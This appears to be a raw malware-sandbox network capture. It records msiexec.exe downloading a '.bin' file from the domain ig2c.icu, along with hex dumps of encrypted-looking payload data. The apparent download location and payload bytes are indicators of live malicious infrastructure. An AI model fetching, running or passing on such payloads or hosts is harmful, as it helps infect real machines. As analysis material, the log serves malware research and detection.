                                                  2024-12-17 07:29:31 UTC1369INData Raw: 6e 45 36 56 45 6d 32 65 48 4a 65 64 56 66 57 45 45 5a 6f 63 38 56 4a 66 59 49 65 64 59 6b 54 78 49 45 32 56 4b 71 57 63 48 4a 66 44 70 38 59 65 59 73 6d 58 4b 71 57 63 48 4a 63 6c 5a 38 6a 39 70 47 47 70 58 36 57 65 48 48 38 50 4c 68 69 58 49 57 67 6b 59 43 77 62 4c 4a 61 6c 6e 70 6c 4f 6e 46 62 62 30 34 47 57 55 6a 6d 34 38 35 33 6a 67 5a 62 38 66 50 5a 30 65 68 4a 39 48 33 43 7a 72 65 43 46 6a 47 67 66 63 4c 4f 74 72 72 43 6c 48 31 49 41 41 54 35 77 6a 52 70 7a 49 30 52 56 51 6c 74 4b 45 6c 38 2b 45 46 56 6c 6a 6b 42 70 68 36 6a 58 56 59 7a 45 7a 61 5a 32 38 36 47 2b 75 50 5a 70 50 49 62 68 39 45 30 67 6d 68 79 59 6b 4e 31 46 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 4a 63 49 64 6c 35
                                                  Data Ascii: nE6VEm2eHJedVfWEEZoc8VJfYIedYkTxIE2VKqWcHJfDp8YeYsmXKqWcHJclZ8j9pGGpX6WeHH8PLhiXIWgkYCwbLJalnplOnFbb04GWUjm4853jgZb8fPZ0ehJ9H3CzreCFjGgfcLOtrrClH1IAAT5wjRpzI0RVQltKEl8+EFVljkBph6jXVYzEzaZ286G+uPZpPIbh9E0gmhyYkN1Fl6WeHJelnhyXpZ4cl6WeHJelnhyXpZ4cl6WeHJcIdl5
                                                  2024-12-17 07:29:31 UTC159INData Raw: 77 4f 74 68 52 76 66 49 47 31 6c 74 56 45 72 47 52 67 51 74 73 37 30 53 38 67 50 4b 4c 74 51 72 53 63 57 50 54 46 70 30 63 58 30 70 53 4f 61 48 42 67 67 47 68 79 58 70 63 36 6b 6b 49 71 4e 2f 35 4c 47 57 4b 6c 73 6f 47 70 53 6f 49 51 58 4c 42 69 6d 4c 59 4a 41 76 4a 6b 73 76 44 67 45 46 4e 55 32 47 49 69 59 71 38 62 50 7a 6b 53 65 30 75 50 71 4b 36 65 36 56 6d 32 6a 67 57 39 57 30 38 38 75 45 35 69 58 70 5a 36 6d 78 30 61 6d 75 48 2b 53 35 68 69 58 39 43 66 54 38 6f 0d 0a
                                                  Data Ascii: wOthRvfIG1ltVErGRgQts70S8gPKLtQrScWPTFp0cX0pSOaHBggGhyXpc6kkIqN/5LGWKlsoGpSoIQXLBimLYJAvJksvDgEFNU2GIiYq8bPzkSe0uPqK6e6Vm2jgW9W088uE5iXpZ6mx0amuH+S5hiX9CfT8o
                                                  2024-12-17 07:29:31 UTC1207INData Raw: 34 62 30 0d 0a 58 4e 6e 57 5a 55 6b 4f 67 35 4a 48 63 69 2f 58 46 6a 54 41 73 73 66 68 57 66 4f 50 69 5a 62 39 43 35 34 42 6c 41 50 4a 37 5a 54 74 61 79 55 41 69 6f 45 31 78 52 76 45 4e 4d 76 46 32 63 67 53 30 65 4e 65 71 41 4c 74 4c 37 4a 44 66 43 65 45 5a 79 47 73 42 47 65 69 66 71 5a 65 33 58 51 73 4f 6e 78 63 38 68 58 45 55 65 49 4c 34 64 6c 36 58 32 32 63 32 35 30 30 34 74 45 6e 76 6e 49 53 52 73 58 51 6c 2b 70 5a 31 6c 45 72 50 6b 4b 53 52 73 58 63 42 39 72 55 6f 4c 4c 48 67 64 67 54 67 62 34 2b 36 72 79 6e 4f 72 4a 34 69 75 47 74 32 6e 72 4e 53 77 74 6b 56 76 65 74 66 50 41 4e 2f 67 4e 4a 65 69 4e 49 30 53 58 35 41 52 52 42 59 69 36 38 34 59 69 49 73 46 50 2f 69 5a 56 76 73 61 7a 4d 30 6b 71 6a 68 66 73 61 57 73 57 39 49 46 63 35 55 79 75 7a 53 68
                                                  Data Ascii: 4b0XNnWZUkOg5JHci/XFjTAssfhWfOPiZb9C54BlAPJ7ZTtayUAioE1xRvENMvF2cgS0eNeqALtL7JDfCeEZyGsBGeifqZe3XQsOnxc8hXEUeIL4dl6X22c25004tEnvnISRsXQl+pZ1lErPkKSRsXcB9rUoLLHgdgTgb4+6rynOrJ4iuGt2nrNSwtkVvetfPAN/gNJeiNI0SX5ARRBYi684YiIsFP/iZVvsazM0kqjhfsaWsW9IFc5UyuzSh
                                                  2024-12-17 07:29:31 UTC1369INData Raw: 31 30 66 38 0d 0a 57 65 48 4a 65 6c 6e 68 79 58 70 5a 36 6f 38 6f 50 49 31 4e 59 72 49 78 78 57 64 4a 76 51 70 32 47 69 6d 6e 54 4d 74 32 43 61 45 75 65 41 4c 74 37 38 42 43 6d 61 67 58 35 6b 41 4b 2f 44 37 39 4c 77 52 57 69 6c 31 4b 34 2f 68 73 51 6c 2f 52 4d 52 69 42 66 48 67 6d 6c 45 54 41 37 64 2f 33 5a 70 69 4c 44 4e 64 46 49 4f 62 4d 6d 6a 52 57 73 4e 56 52 5a 4b 5a 66 79 56 69 68 2f 72 35 32 36 70 2f 68 5a 53 58 6c 45 77 58 52 63 62 7a 35 73 30 31 56 46 74 4d 49 43 32 46 2f 30 56 66 63 34 30 63 36 44 4f 6f 39 59 6a 67 6e 34 62 4b 39 4c 34 52 32 74 4d 6e 61 72 75 67 58 79 41 54 79 55 6d 55 63 39 75 75 53 63 66 2b 68 38 59 73 30 5a 56 4c 35 63 6b 73 6a 67 35 6a 45 67 48 57 38 2b 6d 58 6e 6c 31 44 7a 4b 54 2f 65 4d 36 62 6c 4b 67 64 79 63 68 55 41 37
                                                  Data Ascii: 10f8WeHJelnhyXpZ6o8oPI1NYrIxxWdJvQp2GimnTMt2CaEueALt78BCmagX5kAK/D79LwRWil1K4/hsQl/RMRiBfHgmlETA7d/3ZpiLDNdFIObMmjRWsNVRZKZfyVih/r526p/hZSXlEwXRcbz5s01VFtMIC2F/0Vfc40c6DOo9Yjgn4bK9L4R2tMnarugXyATyUmUc9uuScf+h8Ys0ZVL5cksjg5jEgHW8+mXnl1DzKT/eM6blKgdychUA7
                                                  2024-12-17 07:29:31 UTC1369INData Raw: 34 48 51 67 52 6e 5a 67 4c 55 54 58 4b 38 6f 56 46 32 4d 62 74 75 6e 78 6a 34 4b 58 70 4e 63 30 48 78 48 67 7a 73 74 49 2f 5a 34 75 34 78 73 45 31 43 54 61 42 79 58 70 5a 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 49 34 75 6b 38 46 4d 76 42 48 49 31 72 44 37 35 48 68 69 57 48 70 65 6c 49 59 30 2f 73 66 4f 64 59 41 67 63 5a 5a 48 33 4a 48 51 31 46 79 65 64 56 61 4c 61 76 49 34 6b 62 42 6a 44 39 30 32 56 72 63 44 59 59 69 31 6c 37 6a 67 6a 43 75 6d 46 61 73 4d 6b 57 47 79 32 61 66 68 4d 74 48 49 53 65 4c 76 2b 61 32 4b 76 30 55 51 69 61 36 33 59 36 69 66 76 53 63 30 6f 4d 30 59 57 55 72 53 2b 57 51 62 4a 6f 2f 58 59 5a 79 6b 57 53 74 34 4f 51 49 4d 66 36 32 6f 53 2b 70 41 57 53 6b 69 34 30 53 59 58
                                                  Data Ascii: 4HQgRnZgLUTXK8oVF2Mbtunxj4KXpNc0HxHgzstI/Z4u4xsE1CTaByXpZ4cl6WeHJelnhyXpZ4cl6WeHJelnhyXpZ4cI4uk8FMvBHI1rD75HhiWHpelIY0/sfOdYAgcZZH3JHQ1FyedVaLavI4kbBjD902VrcDYYi1l7jgjCumFasMkWGy2afhMtHISeLv+a2Kv0UQia63Y6ifvSc0oM0YWUrS+WQbJo/XYZykWSt4OQIMf62oS+pAWSki40SYX
                                                  2024-12-17 07:29:31 UTC1369INData Raw: 72 67 4b 54 64 30 69 6d 66 48 47 39 7a 4a 77 32 6e 61 49 30 37 47 6e 58 7a 78 39 6b 52 5a 6e 45 43 58 43 67 47 66 48 4a 65 71 47 39 6d 58 70 5a 37 51 4a 77 65 2f 64 59 52 51 30 32 42 69 2f 65 39 57 4a 35 4b 6a 77 2b 36 71 48 59 45 6c 69 71 6f 50 6d 34 71 57 48 5a 66 57 52 6e 34 6c 46 76 72 4f 38 6e 67 34 65 66 42 78 6b 52 32 6e 39 70 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 74 2b 6e 76 62 32 4b 58 61 45 34 70 35 6a 72 55 5a 74 58 72 61 4c 74 2f 70 2f 30 59 6c 2f 51 6e 66 51 75 70 77 4a 31 57 6d 30 48 4f 56 43 52 76 41 77 67 38 48 70 31 2b 38 4b 55 42 44 79 52 33 4e 7a 2b 4d 6c 30 38 4c 4c 48 30 64 6e 44 69 6e 36 75 6d 36 4e 34 77 66 58 56 6a 4f 61 4f 6f 6e 2f 6f 4c 63 35 51 39 6c 78
                                                  Data Ascii: rgKTd0imfHG9zJw2naI07GnXzx9kRZnECXCgGfHJeqG9mXpZ7QJwe/dYRQ02Bi/e9WJ5Kjw+6qHYEliqoPm4qWHZfWRn4lFvrO8ng4efBxkR2n9p4cl6WeHJelnhyXpZ4cl6WeHJelnhyXpZ4cl6Wet+nvb2KXaE4p5jrUZtXraLt/p/0Yl/QnfQupwJ1Wm0HOVCRvAwg8Hp1+8KUBDyR3Nz+Ml08LLH0dnDin6um6N4wfXVjOaOon/oLc5Q9lx
                                                  2024-12-17 07:29:31 UTC245INData Raw: 6c 49 4f 31 30 56 49 37 51 77 77 71 46 2b 58 4b 4a 4b 76 78 50 6e 6f 51 45 45 76 57 52 4a 4e 68 32 54 30 76 55 6e 58 4c 63 4e 51 77 35 6a 4b 37 66 45 45 59 71 52 68 65 64 65 55 34 67 4e 58 49 6b 61 42 35 66 70 61 44 51 57 6d 66 58 37 44 69 61 37 4c 33 6b 6b 59 50 78 76 76 58 30 6f 76 62 76 71 66 38 46 56 49 77 46 44 7a 6b 6e 47 39 55 49 54 55 6b 74 45 78 2f 61 6a 37 61 70 39 73 45 75 4b 2b 4f 57 70 5a 35 4b 4b 58 62 66 4f 50 6f 6b 61 41 33 44 4d 48 57 64 65 57 65 4b 72 52 48 32 41 70 56 30 70 4b 32 42 72 32 54 71 4f 46 57 4e 2b 5a 35 4d 4a 67 56 52 51 4d 6a 6a 47 71 35 67 66 50 5a 6c 50 4a 6e 68 66 4d 37 48 78 67 39 55 44 4a 48 70 55 57 4b 76 68 59 72 72 75 63 75 76 53 6d 65 76 53 73 55 6b 52 2f 73 58 71 58 6d 6b 6e 68 0d 0a
                                                  Data Ascii: lIO10VI7QwwqF+XKJKvxPnoQEEvWRJNh2T0vUnXLcNQw5jK7fEEYqRhedeU4gNXIkaB5fpaDQWmfX7Dia7L3kkYPxvvX0ovbvqf8FVIwFDzknG9UITUktEx/aj7ap9sEuK+OWpZ5KKXbfOPokaA3DMHWdeWeKrRH2ApV0pK2Br2TqOFWN+Z5MJgVRQMjjGq5gfPZlPJnhfM7Hxg9UDJHpUWKvhYrrucuvSmevSsUkR/sXqXmknh
                                                  2024-12-17 07:29:31 UTC1369INData Raw: 35 61 38 0d 0a 7a 47 48 50 74 67 70 34 41 66 39 57 34 48 58 77 34 57 56 50 4c 45 2b 62 66 4a 67 42 35 43 6e 78 4d 4b 49 55 52 6e 68 52 43 71 43 45 78 65 54 68 39 53 4b 72 43 71 37 33 6a 42 41 38 6f 79 5a 70 6b 61 43 31 36 76 2f 6c 35 44 63 48 69 73 77 74 51 6a 47 6a 6b 66 58 51 38 59 6a 52 4f 56 63 78 37 78 6e 46 31 44 45 32 37 48 6c 57 6e 7a 7a 36 56 48 2f 4c 5a 5a 46 6c 53 6d 33 2f 6c 5a 48 2f 56 72 30 59 6d 78 46 6d 53 4b 78 30 64 57 7a 6f 41 65 52 5a 38 55 43 73 4f 6e 37 65 32 43 34 57 31 34 47 42 48 4b 4d 57 39 57 38 6f 36 6a 32 63 6f 6d 30 58 4a 38 79 74 2f 73 64 50 62 65 54 6f 42 77 61 56 7a 50 33 42 66 79 45 34 4b 61 66 62 48 6c 2b 59 35 36 45 6d 37 47 6d 55 62 38 46 61 6c 35 70 4a 34 63 2f 2f 67 61 44 70 77 6b 6d 6a 68 43 66 69 7a 68 78 78 31 56
                                                  Data Ascii: 5a8zGHPtgp4Af9W4HXw4WVPLE+bfJgB5CnxMKIURnhRCqCExeTh9SKrCq73jBA8oyZpkaC16v/l5DcHiswtQjGjkfXQ8YjROVcx7xnF1DE27HlWnzz6VH/LZZFlSm3/lZH/Vr0YmxFmSKx0dWzoAeRZ8UCsOn7e2C4W14GBHKMW9W8o6j2com0XJ8yt/sdPbeToBwaVzP3BfyE4KafbHl+Y56Em7GmUb8Fal5pJ4c//gaDpwkmjhCfizhxx1V
                                                  2024-12-17 07:29:31 UTC86INData Raw: 52 65 62 31 53 7a 49 4f 76 51 6b 2b 2b 59 59 71 30 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 4a 65 6c 6e 68 79 58 70 5a 34 63 6c 36 57 65 48 43 53 6c 57 4b 6e 32 63 5a 4f 53 62 50 58 49 6f 6b 57 4b 44 6c 41 57 55 37 49 61 76 73 0d 0a
                                                  Data Ascii: Reb1SzIOvQk++YYq0cl6WeHJelnhyXpZ4cl6WeHJelnhyXpZ4cl6WeHCSlWKn2cZOSbPXIokWKDlAWU7Iavs


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.949815172.67.210.114438088C:\Windows\SysWOW64\msiexec.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-17 07:30:17 UTC182OUTGET /JvCarekj/NywxkpRVdifOOuG4.bin HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                  Host: ig2c.icu
                                                  Cache-Control: no-cache
                                                  2024-12-17 07:30:17 UTC860INHTTP/1.1 200 OK
                                                  Date: Tue, 17 Dec 2024 07:30:17 GMT
                                                  Content-Type: application/octet-stream
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: MISS
                                                  Last-Modified: Tue, 17 Dec 2024 07:30:17 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cGaf%2BHBy3jQEJGXXO5DutuMrowbjrHGmMe%2B6KX2fLeC%2FwS3GnP%2BqmMDVg6Ae%2BJxw8WSD9spmwQougGELnTmctjHc9UIOAtg1qDlvMLEzea7F0Gq%2BFHxerGjEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f3534fafe2042e5-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1703&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2813&recv_bytes=820&delivery_rate=1688837&cwnd=221&unsent_bytes=0&cid=c828a3a157d4dd2b&ts=694&x=0"
                                                  2024-12-17 07:30:17 UTC509INData Raw: 33 38 63 36 0d 0a 9c 71 72 35 6a d7 63 bb 2b 53 a6 e7 dc 79 19 c5 b5 74 78 6a ad 23 f6 27 6c e1 e2 46 5e f5 1f 56 aa c6 5b 54 6c 5e 9b b8 7b ac 9a 86 0e 92 7a 33 c9 f7 55 af e4 fc 4a 54 59 2e fc 30 bd 83 6c 61 f4 1a d0 c8 90 64 4b 04 87 78 3a f1 ee 9d 40 2a d5 c2 b2 c5 ff 54 00 fa d0 d2 ee ba a6 7f 4a df 5f e4 da 83 26 0d 5d 2c 4a e8 a6 f9 0a 7b cb 43 7b bf 9e ab fa 76 a4 4c e3 31 5f 38 0c a7 d6 2b e0 49 36 9d ea c5 80 7d f8 fe 1a 12 67 0f 1e e0 1e 11 6c fc 8a 7d c1 94 f3 57 07 84 aa 89 d8 f0 28 79 68 c1 28 24 1d a5 98 8b 70 4f 1b 15 47 f2 6b af 6d 40 d5 21 63 3b b6 ea b2 ed 5e b2 4d e8 10 48 09 4a 37 97 a4 c0 25 7e 43 15 6a 6f e3 2b ea 22 f3 da e9 bf fd d2 46 21 c1 a5 55 eb 4d b3 5a e0 1b 3f b0 c7 39 80 18 77 a5 17 02 90 a7 22 c7 99 be 94 ef 8b 43 65 07
                                                  Data Ascii: 38c6qr5jc+Sytxj#'lF^V[Tl^{z3UJTY.0ladKx:@*TJ_&],J{C{vL1_8+I6}gl}W(yh($pOGkm@!c;^MHJ7%~Cjo+"F!UMZ?9w"Ce
                                                  2024-12-17 07:30:17 UTC1369INData Raw: 2b 34 b0 aa 90 5f e7 3c 77 8b 27 93 60 90 67 f0 11 ce 7a 57 0f ec 03 60 0a ae a3 30 40 c6 48 ab 08 b6 25 24 aa 56 fe ee 60 21 86 c7 a7 17 41 bb 4d 70 56 0d 9f c6 0c 76 3c 82 38 a1 b6 93 88 f9 a2 54 2a 31 58 1c fa 94 29 4d 7f c0 3f 2f 4c 17 52 1f 8a 32 7f a2 5f fe 5b 80 48 3b 58 b4 e1 7f da f7 3a 47 5c d7 45 d4 3f bb 7d 10 70 7b 7e f9 76 84 16 83 ed b9 8b 4a e1 07 70 5e d2 16 16 3e b7 c7 61 24 b6 26 b7 58 d8 f1 9b 6b 1c bf fc ec 6a 6e 3c d1 3f 4e 62 e8 76 ea a7 8e 51 58 77 ec cd ba 3f 01 c6 df 61 a6 0c 02 60 8a 8f 39 6a f1 4c ec fa 5f 54 f3 b1 f8 58 b5 fd ef 05 9a b3 25 bd 80 ce 67 31 27 98 fc 5e 86 12 10 91 58 d1 79 da d6 a6 ee ed e2 93 1d c3 1b ea 51 0e 7a 2c 1c ef ef 67 c7 89 8b 65 d1 9f 6b 7b 9f 9d 64 f5 2f 58 1e f5 6e 32 3e fe c1 d8 8f 8b ef f0 13 e1
                                                  Data Ascii: +4_<w'`gzW`0@H%$V`!AMpVv<8T*1X)M?/LR2_[H;X:G\E?}p{~vJp^>a$&Xkjn<?NbvQXw?a`9jL_TX%g1'^XyQz,gek{d/Xn2>
                                                  2024-12-17 07:30:17 UTC1369INData Raw: b0 c4 ff ef 05 f2 4c a2 f8 80 26 85 05 24 98 a5 9d 3f a2 44 d6 18 39 22 16 f8 d2 ea 87 63 d6 1d 2b de de 52 0e 23 9f a2 0f bb 22 c7 61 15 96 d7 9f 03 58 1e d8 64 1d 99 6c 1d f5 37 f1 c7 86 94 5f a1 04 01 94 77 92 e5 41 09 2b a2 01 eb 45 6a 09 8e e3 cd 00 32 9e 3f 75 01 79 1c 2f 92 1c cd fe 7a aa b2 15 56 de a9 26 0d dd 89 7a 50 dd 0b ae 28 75 41 74 39 51 71 68 78 b4 63 9f ca 01 1c 89 f2 28 55 8c f9 56 11 7a 74 90 6a 27 4b 22 63 6b ca 7d 45 84 3a c6 a3 24 e1 4e 14 93 82 0a de d0 58 71 45 51 03 6e 30 20 63 f6 40 8b 56 b7 8e d9 7d f1 64 bc 10 6c ac 1b a6 ca 86 8e 86 37 15 57 87 29 e7 86 0c 6f 70 e6 d1 fe 5b 9b d1 ea 87 95 2c 1a 8c 81 d7 cb 01 7b a5 85 de 97 76 93 8b 2f 86 1b d6 d1 30 56 9b 71 8f f8 47 d8 bc 7a 85 a7 c3 99 62 91 31 71 7c b9 41 2d aa b1 48 9a
                                                  Data Ascii: L&$?D9"c+R#"aXdl7_wA+Ej2?uy/zV&zP(uAt9Qqhxc(UVztj'K"ck}E:$NXqEQn0 c@V}dl7W)op[,{v/0VqGzb1q|A-H
                                                  2024-12-17 07:30:17 UTC1369INData Raw: 61 a3 19 2d 0d 8a ea 42 f6 ab 41 b8 07 c8 83 44 c3 e5 fd d0 ca b3 83 0c 84 6b 49 32 cf 7f 9d be 43 a7 43 9b ac 1f 98 bf 2c 86 3c 3a d6 78 6a 9b 71 31 77 8e f2 bf 12 75 1b 56 f2 cd 68 fd 2b 09 fa d1 ce 25 91 4b b4 3b 0b 7c 2c 7b 31 55 20 fc 89 b5 d8 b8 1f 6f 50 e3 1d 19 72 d6 66 a7 14 74 fd 25 f9 b0 ef 71 cb a0 95 7b 71 f1 f5 82 cc 07 8b eb 85 00 c4 48 8b 2e 66 a0 4d b7 a6 74 65 6d cf a7 5b 44 68 87 cc b4 66 0a af a0 2c fb bf cf 17 e8 ef 95 a0 64 bf dd ec fa 8c ce 98 c4 cc 7d f5 69 9f ed 7f 91 f1 0f b3 1c 4c df 61 58 00 d1 81 83 54 5b 00 2c 42 a8 a3 46 ac 24 0d ec 9d b2 1c d8 71 4f 2f 88 3c f4 f5 a0 ca 80 5c f8 35 ae 99 57 82 35 a8 50 0f 6d aa fc f0 10 86 37 66 ff 90 fa 56 88 43 f7 fd 2a d4 8b 81 d6 00 ae fa 59 2b 78 88 82 94 b0 df 45 ab 10 38 c1 e6 d2 f6
                                                  Data Ascii: a-BADkI2CC,<:xjq1wuVh+%K;|,{1U oPrft%q{qH.fMtem[Dhf,d}iLaXT[,BF$qO/<\5W5Pm7fVC*Y+xE8
                                                  2024-12-17 07:30:17 UTC1369INData Raw: a4 46 21 38 7f f6 67 e6 b5 f2 36 c2 2e 20 90 24 f5 a0 22 58 23 ff 35 23 85 25 10 45 13 16 0f e0 ab 94 6c 00 6e 2e 8f 1a 85 44 de fb 8f 27 fb 6e 7b c1 69 a2 fc b9 43 26 0b 2e 2e 3c 84 17 14 61 d4 05 54 55 4b 74 5a 16 d3 d1 e1 bf 8a c1 7f f2 53 83 08 db ca 7e e3 aa 17 d9 e6 fd b8 6a 38 12 97 63 96 49 89 b0 a5 0b d1 89 db 90 ea 2b ba 23 a6 9d e3 33 0a fe 91 e8 f8 2a 76 3d 1a 93 92 ff ea a0 18 c1 5e b6 8f 30 1d b0 33 42 e3 81 df f6 5a e5 75 5e b0 43 70 d0 ae 21 be 3c 30 e6 c7 86 c0 5e 5e ce 71 62 47 a8 0e ba cc dd 7c 7a 4e 37 31 b5 b0 6d e4 c1 42 20 bb 25 ff cb 53 c7 3b db aa f2 7b 44 40 20 5f 66 4b 04 4f 91 eb f3 11 62 f8 6d 13 87 b2 2d f3 08 05 fa c1 81 b8 ed 2f 1a ba 61 07 a9 9d 83 ad c3 b5 b0 48 e8 a6 a8 e2 8d c9 43 7b 3b 5e df d8 f5 c1 b0 e3 60 d4 f6 fc
                                                  Data Ascii: F!8g6. $"X#5#%Eln.D'n{iC&..<aTUKtZS~j8cI+#3*v=^03BZu^Cp!<0^^qbG|zN71mB %S;{D@ _fKObm-/aHC{;^`
                                                  2024-12-17 07:30:17 UTC1369INData Raw: 44 da 1f c9 a3 c3 3c d3 21 b8 f5 64 4c 98 7b 46 4f 04 83 f3 7e d5 19 3c 82 2e 6d 91 e7 93 a8 df 7c de 84 59 37 31 69 97 0e db 5f e4 51 6b ad c2 de 51 4a e0 d5 da e2 9c 35 bc 84 34 96 ea ab fd 6b a4 06 cc a0 c7 44 2d 1d c3 33 ab 73 6c ba 99 de 42 26 b9 98 9a a6 c5 62 60 ba 9f b3 73 73 e2 2d 2d c4 d2 e4 1a 34 18 e6 77 56 54 0a a4 51 06 e3 00 50 63 e0 90 a0 d1 dc 3a 69 cd 09 25 78 0a 6e ba 5d 02 28 13 a1 4d c6 23 97 c3 59 f6 81 72 8d 35 7b ef 5e e2 32 9d e1 56 16 a4 5f f1 b2 2e e4 c6 ba cd e4 52 aa 19 10 33 59 99 60 1f bb 86 2d fa 59 95 8b 4d 4f 8a 27 d7 e0 57 fd b9 4d 3c 96 1b e2 ad 7d cd 7d c4 9d 8e 1f 86 b0 aa d0 70 45 dc b7 d8 41 d8 1e 7f e7 ee 8d 63 e5 21 99 2a 5f 11 0e ae eb 2d 02 02 a0 1a d3 47 6d 3f 45 b1 69 91 fa 12 f5 a1 8b 3e ab 6a ae 0b 8a e2 cf
                                                  Data Ascii: D<!dL{FO~<.m|Y71i_QkQJ54kD-3slB&b`ss--4wVTQPc:i%xn](M#Yr5{^2V_.R3Y`-YMO'WM<}}pEAc!*_-Gm?Ei>j
                                                  2024-12-17 07:30:17 UTC1369INData Raw: 8e a3 9c 27 df ba 4d e1 78 e4 1d 7f fc 10 cd 31 b2 08 4e 0d 28 c9 78 65 17 da cb 5b ee cc 25 b0 2b 6d ba 67 32 a7 b9 3a a2 ca 19 da cb 39 52 26 44 4a 8d 01 34 87 7a 73 69 63 c9 6e 0a 41 83 b5 fb 6a b9 3f f3 f5 33 f1 8f d3 e1 97 f2 41 a8 a0 92 57 bd 68 26 42 65 4f 63 57 4a a7 37 4e 88 62 2b c2 b0 5d c1 36 5a 8e 0b 65 38 19 d8 46 61 25 33 64 19 b0 d8 a4 5a c2 72 bd 1a 93 d4 4c a9 f5 d6 44 bf c2 fd 32 73 c2 f8 0b 6c e0 ac bd 49 6c 01 f3 df 66 60 e8 ed ca 95 e0 92 35 06 4e 6b e6 30 18 87 62 5c 3c ca 57 12 4d 5f 61 2b 5f 53 b1 0a 4d 38 ec 36 cd cc 6d 46 be 3f 10 df 9a 20 00 07 4d 8b 2f 88 7e a3 b8 23 fa 20 cd e8 8b 40 b7 76 ea e6 99 14 0b f1 e4 1a c7 83 0b e2 a4 ce dd cf a6 92 c7 51 2d ea 89 1f 88 09 c4 4f 1f e9 e3 61 7e 0b ab 63 ed eb a0 50 0b 06 9f 6c 47 51
                                                  Data Ascii: 'Mx1N(xe[%+mg2:9R&DJ4zsicnAj?3AWh&BeOcWJ7Nb+]6Ze8Fa%3dZrLD2slIlf`5Nk0b\<WM_a+_SM86mF? M/~# @vQ-Oa~cPlGQ
                                                  2024-12-17 07:30:17 UTC1369INData Raw: cd e1 5a bb 5b 3d bb 92 65 4c 09 bc 18 80 d7 1e c7 97 3d 4d 1d 22 a1 78 f4 fa 0e 23 77 8d 07 77 44 ad 77 71 c8 b1 3a ca 7c d2 a5 d0 d0 78 61 65 7d 0c a3 4f 75 6d 5e 97 1b 30 4c 6d 5d e5 a3 02 94 b1 8d bb e9 c8 35 c8 33 a8 35 aa 0f ef d6 0d 6c e9 3c 50 c7 91 68 a8 18 7b 24 80 b1 6c 40 e3 18 ee 31 f9 93 03 2e 0b 60 e3 b0 a3 30 40 97 a0 b5 08 52 f6 7b 68 4a fe 07 47 a9 55 c1 f6 bf 59 bb 4d 70 0f cf 9b c6 e5 5d 3c 82 a8 1c 1c 39 27 f3 61 df 66 15 5c f5 d5 94 29 4d f4 8c 1b 2b a5 3b 52 1f 8a 58 7e c8 5d 01 2f 8a 30 b6 c0 27 1e 80 59 c6 47 80 58 d7 3f d5 55 ba f0 61 54 77 92 34 91 7b e9 00 29 b5 49 4e e1 bf 8f a1 2d 49 d5 bd 1f 16 d0 13 82 04 5d 82 53 c4 b5 e1 d7 57 fa 1c 95 91 cd 1b b4 be fc 2e 83 15 58 05 2d 7c 63 c7 3d 31 f0 e9 70 6a 9e 59 77 ea 72 c3 70 97
                                                  Data Ascii: Z[=eL=M"x#wwDwq:|xae}Oum^0Lm]535l<Ph{$l@1.`0@R{hJGUYMp]<9'af\)M+;RX~]/0'YGX?UaTw4{)IN-I]SW.X-|c=1pjYwrp
                                                  2024-12-17 07:30:17 UTC1369INData Raw: d4 3f bb 5f 98 3d 6b 92 90 76 84 16 d3 60 fc 83 1a 6c 4a 7c b6 b3 36 16 3e 87 64 56 bc 5c 9c 86 b0 a9 dc 1d 95 4c 32 21 e1 82 22 46 d0 3f 1e 9f 23 9e 32 a4 8e 51 d3 b1 b2 46 5f 62 c3 d6 9f 0b 59 26 2c fb 9f df 48 3b 19 91 ac a7 5f 96 fb a1 16 6d 59 0c 10 8e de 67 27 36 89 f5 6f 3e b3 58 3e 5a 86 99 11 1a 54 f5 7d 31 f9 03 7a 5c e6 93 f4 2d ed 15 ae e7 fc 59 1b ef 64 64 4c c5 af 9f fc 9e a9 7f 9f 74 94 0a d0 a7 48 a2 e5 4e 5a ea 4a e9 f6 04 67 6a 88 6d 06 a2 0c ae d6 ca b4 05 4d 11 3f 7d 49 ff 74 4d 93 b9 cf 40 6b 4b c4 e3 d1 ed e7 10 c6 d9 c2 02 2d 23 54 1e 0a 88 e9 45 5e ba a3 c1 15 57 6c 02 f1 bc 0d 0e 9c 88 ce 11 07 02 65 b8 04 50 5a ee ee 19 f8 16 b2 cf 16 87 1d d1 41 f9 3b 90 b2 0b 73 a3 2c fc d8 43 09 60 55 b9 43 f4 39 9b e4 d5 bf 20 63 9e 3e 4e 37
                                                  Data Ascii: ?_=kv`lJ|6>dV\L2!"F?#2QF_bY&,H;_mYg'6o>X>ZT}1z\-YddLtHNZJgjmM?}ItM@kK-#TE^WlePZA;s,C`UC9 c>N7
